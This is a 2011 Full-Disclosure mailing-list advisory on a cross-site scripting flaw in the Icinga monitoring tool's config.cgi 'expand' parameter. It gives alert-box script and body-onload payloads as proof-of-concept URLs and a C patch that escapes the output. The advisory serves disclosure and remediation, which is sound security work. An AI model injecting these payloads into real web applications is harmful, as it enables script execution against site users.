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Message-ID: <4DE67F2B.9050108@t-online.de>
Date: Wed, 01 Jun 2011 20:04:27 +0200
From: "sschurtz@...nline.de" <sschurtz@...nline.de>
To: full-disclosure@...ts.grok.org.uk
Subject: Cross-Site Scripting vulnerability in Icinga

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Advisory:           Cross-Site Scripting vulnerability in Icinga
Advisory ID:        SSCHADV2011-005
Author:             Stefan Schurtz
Affected Software:  Successfully tested on: icinga-1.3.0 / icinga-1.4.0
Vendor URL:         http://www.icinga.org
Vendor Status:      Resolved
CVE-ID:             -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

No input validation for "expand" in config.c(gi)

View Config -> Command Expansion -> To expand ->
<script>alert(String.fromCharCode(88,83,83))</script>
View Config -> Command Expansion -> To expand -> <body onload=alert(666)>

or

http://www.example.com/icinga/cgi-bin/config.cgi?type=command&expand=<script>alert(String.fromCharCode(88,83,83))</script>
http://www.example.com/icinga/cgi-bin/config.cgi?type=command&expand=<body
onload=alert(666)>

=========
Solution:
=========

in config.c

< printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD
CLASS='dataEven'>%s",command_args[0]);
> printf("<TR CLASS='dataEven'><TD CLASS='dataEven'>To expand:</TD><TD
CLASS='dataEven'>%s",escape_string(command_args[0]));

This solution doesn't fix the whole problem - see
https://dev.icinga.org/issues/1605#note-3 for more information

====================
Disclosure Timeline:
====================

01-Jun-2011 - informed developers
01-Jun-2011 - Release date of this security advisory
01-Jun-2011 - fixed - Target version: 1.4.1
01-Jun-2011 - post on BugTraq and Full-disclosure

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

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References:
===========

http://www.icinga.org
https://dev.icinga.org/issues/1605
http://www.rul3z.de/advisories/SSCHADV2011-005.txt
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